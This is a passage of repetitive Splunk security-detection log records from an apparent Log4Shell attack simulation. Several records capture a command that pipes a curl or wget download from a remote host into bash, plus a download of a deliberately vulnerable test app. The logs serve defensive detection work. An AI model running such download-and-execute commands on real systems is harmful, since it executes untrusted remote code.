Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642639155, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CIS 12", annotations._all="PR.DS", annotations._all="CIS 13", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639155, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="T1190", annotations._all="CIS 12", annotations._all="PR.DS", annotations._all="CIS 13", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642639116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download 